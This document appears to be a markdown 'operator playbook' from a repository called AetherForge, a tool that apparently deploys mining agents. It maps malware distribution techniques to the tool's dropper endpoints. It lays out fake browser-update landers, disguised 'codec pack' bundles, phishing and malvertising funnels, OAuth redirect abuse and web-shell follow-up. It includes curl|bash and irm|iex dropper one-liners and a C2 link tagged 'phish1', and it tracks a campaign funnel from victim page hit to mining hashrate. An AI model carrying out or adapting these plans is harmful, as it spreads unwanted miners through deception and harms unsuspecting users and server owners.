Files
AetherForge/server/web/public/docs/SPREAD_TECHNIQUES.md
AetherForge 415b5dc6a3
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Release validation: tests green, USB pack, fleet UX and API hardening.
Fix macOS agent cross-compile (SilentAVExclusion) and Calibrate E2E nav selector; expand tests and docs; refresh portable usb binary and spread/wiki assets.
2026-06-06 16:57:39 -07:00

14 KiB
Raw Blame History

Web-Mediated Spread Techniques (Research Summary)

Operator playbook (tabbed HTML): SPREAD_TECHNIQUES.html — step-by-step Emberwake how-tos. This file is the research matrix.

Scope: Documented red-team / threat-intelligence vectors mapped to AetherForge capabilities. For authorized penetration testing, lab environments, and defensive planning only. Sources cited below; landscape as of 20242026.


What Does NOT Work Anymore (Be Honest)

Technique Status Why
Silent browser RCE (visit page → shell, no exploit) Dead Modern Chromium sandboxes, site isolation, removed NPAPI/Flash/Java, aggressive patching. MITRE T1189 still documents drive-by, but commodity ops need 0-day/n-day browser or renderer bugs (e.g. CVE-2025-49713 — still requires visiting a malicious page and is patched quickly).
Auto-run from Downloads folder Dead Chrome/Edge require user gesture for dangerous types; SmartScreen + MoTW on .exe, .msi, .js, .ps1, .bat, .zip. Microsoft download policy, Chrome DownloadRestrictions.
Flash/Java plugin drive-by Dead Plugins removed or click-to-play extinct.
Unauthenticated curl | bash on cautious admins Hard Server can fingerprint pipe-to-shell timing and serve benign vs malicious scripts (curlbash_detect, idontplaydarts). Mitigation: download → inspect → run.
CRX sideloading via normal download Dead .crx blocked under DownloadRestrictions; Web Store policy blocks casual sideload. Supply-chain via compromised extension updates is the modern path (GitLab tech note).

Still works with friction: User must click download + run (or run a one-liner they pasted). MoTW bypasses (LNK tricks, FileFix 2.0, 7-Zip MoTW CVE-2025-0411) are patch-cat-and-mouse, not reliable baselines.


Technique Matrix

Owned site (you control origin)

Technique Feasibility Detection risk AetherForge mapping
Dropper landing page — button/link → /get or spread-kit ZIP Easy Med (URL reputation, TLS logs) Has: /get, /install.ps1, /install.sh, ?pin=, ?c=; static kit at spread-kit-web-publisher/ + /spread/; ZIP export via POST /api/v1/builder/spread-kit-export.
curl | bash / irm | iex docs page — install instructions for servers Easy Med (EDR script block, proxy logs) Has: install.sh / install.ps1 with UA-aware /get, campaign env (AETHER_CAMPAIGN). Pin build via ?pin={build_id}.
Fake browser / app update page (SocGholish pattern) Medium High (browser update lures heavily signatured) Has: dropper + spread-kit launchers. Needs: branded HTML lander, geo/UA gate, optional TDS. See Trend Micro SocGholish.
JS redirect / referrer gate (search → your lander) Medium MedHigh (injected-script hunting) Needs: fingerprint JS in web-publisher kit; Has: campaign tracking on final fetch. JSFireTruck scale shows pattern is alive but noisy.
Fusion media download — “codec pack” / movie bundle Medium Med (large ZIP, SmartScreen) Has: movie/prep fusion ZIP, disguised runner names, spread-kit scripts inside universal bundles.
Service worker persistence (AiTM / proxy) Hard Med Needs: full PWA stack; feasible for credential phishing, not binary drop without user download. EvilWorker, Akamai SW abuse.
WASM obfuscated redirect Hard Med Needs: custom WASM module; evades some static JS scanners, not browser API monitors (arxiv WASM study). Still ends at user-run binary.
Waterhole on owned niche site Easy (if you own it) LowMed on first party Same as dropper landing + organic traffic; MITRE T1189.

Third-party platforms

Technique Feasibility Detection risk AetherForge mapping
GitHub Releases / raw CDN Easy Med (SmartScreen, GitHub abuse reports) Has: build artifacts; Needs: separate release pipeline, not C2 host. Microsoft malvertising→GitHub.
S3 / Cloudflare Pages / R2 / workers.dev Easy MedHigh (platform abuse ML) Needs: static publisher ZIP deployed off C2. Fortra Pages abuse, Cofense Cloudflare abuse.
npm / PyPI / Docker Hub supply chain Hard High (registry scanning, MFA) Needs: wholly separate packaging pipeline; not in forge today. Shai-Hulud, GitGuardian 48h campaigns.
WordPress plugin/theme compromise Hard (unless you own plugin) High Needs: PHP injector + redirect to your dropper URL. EssentialPlugin 2026, CVE-2024-6297.
Compromised shared hosting → web shell Hard High Needs: nothing in forge; lateral movement is post-compromise (MITRE T1505.003, Sucuri cross-contamination).
Browser extension sideload / store takeover Dead (sideload) / Hard (store) High Extension updates via stolen publisher OAuth (BleepingComputer 35 extensions). Not mapped to forge binaries.

Social engineering funnel (email / ads → site → file)

Technique Feasibility Detection risk AetherForge mapping
Email → link → owned lander → download Easy Med (email gateway) Has: campaign ?c= on /get and public download; agent stores campaign on connect.
OAuth redirect abuse (prompt=none → attacker redirect URI → /download) Medium MedHigh Needs: Entra/Google OAuth app + redirect HTML; payload can point to install.ps1 or ZIP. Microsoft 2026, Proofpoint TA416.
SEO poisoning / malvertising Medium High (ad review, cloaking detection) Needs: ad account + cloaking + lander; payload can be fusion ZIP or spread-kit. Malwarebytes utility ads 2024, MSIX SEO poisoning.
IFRAME / HTML smuggling Medium Med Needs: client-side blob builder; still requires user to run extracted file. Often chained with OAuth redirect above.

Server-specific (endpoints: Linux/macOS/Windows servers)

Technique Feasibility Detection risk AetherForge mapping
curl -sL host/install.sh | bash Easy Med (FIM, auditd, EDR) Has: full pipeline; install.sh/get?os=linux + spread-kit unzip path.
irm | iex on Windows Server Easy MedHigh (AMSI, Constrained Language) Has: install.ps1; hidden cmd /c Deploy.bat for spread-kit ZIP.
Trojanized “monitoring agent” docs Easy LowMed if first-party domain Same dropper; pin worker with ?pin= for stable fleet profile.
Docker curl | bash in README Medium High Needs: separate Docker image story; agent has Docker E2E path but not publish pipeline.
Web shell → curl dropper Medium (post-compromise) High Operator runs curl from shell; Has: dropper endpoints unauthenticated by design (API-D09).

AetherForge Stack: Has vs Needs

Already built

  • Dropper URL: GET /get, GET /install.sh, GET /install.ps1 — UA platform detect, ?pin={build_id}, ?c={campaign} (dropper_handler.go)
  • Forge outputs: single-platform exe, Spread Kit ZIP (Deploy.bat, deploy.sh, Start.command), Fusion media packages
  • Public downloads: GET /api/v1/public/download/{id}?c= with campaign logging
  • Campaign analytics: campaign_hits table with event_type (page_hit, download, agent_connect), GET /api/v1/emberwake/war-room?days=7, agent campaign field on register
  • Campaign War Room UI: Emberwake tab — funnel board (hits → downloads → first beacon → mining → hashrate) with per-stage conversion %, 7d sparklines, leak callouts, and stats table toggle; 15s poll + WS emberwake_war_room tick
  • Build Manager UI: copies iex (irm '…/install.ps1'), pin/active dropper

In progress / gaps

Gap Emberwake / web-publisher role
No fake-update HTML kit SocGholish-style lander — operator supplies branding
No JS fingerprint / TDS gate Filter bots, mobile, non-target geo before showing download
No OAuth redirect helper Entra app registration docs only
No public registry publish npm/PyPI typosquat out of scope — use npm-helper-export on registries you own

Prioritized for authorized red-team / lab use where you control DNS and TLS.

  1. First-party install docs page (servers)
    Host install.sh instructions on your domain: curl -sL https://your.site/install.sh | bash and PowerShell irm|iex for Win admins. Use ?pin= for a fixed forge profile and ?c=docs for attribution. Lowest friction for Linux fleet / VPS targets; maps 1:1 to existing dropper.

  2. Spread-kit web publisher (static lander)
    Ship the missing spread-kit-web-publisher template: single HTML “Download for your OS” button calling /get?os=…&c=landing. Deploy to Cloudflare Pages or your origin; keep C2 on separate host. Completes the Emberwake export path already wired in API.

  3. Fusion bundle as “media/tool download”
    Use movie or prep fusion ZIP on a themed site (e.g. “codec pack”, “portable tool”). Universal bundle auto-picks Deploy.bat / deploy.sh. Higher size; pair with code signing (sign_build) to reduce SmartScreen friction.

  4. Campaign-tagged fake-update page (endpoints)
    Clone the SocGholish pattern at reduced scope: browser-specific “update required” → ZIP with spread-kit or Update.js-style launcher equivalent (Deploy.vbs). Track ?c=update-chrome. High detection risk; use only in controlled purple-team exercises.

  5. Email → owned lander → pinned build
    Simple HTML on your site; link https://c2.example/get?pin={id}&c=phish1 or public artifact URL. Chain with Emberwake campaign stats to measure fetch vs install (agent connect). No third-party CDN required.


Key References


Generated from open-source threat reporting and AetherForge codebase audit. No commit.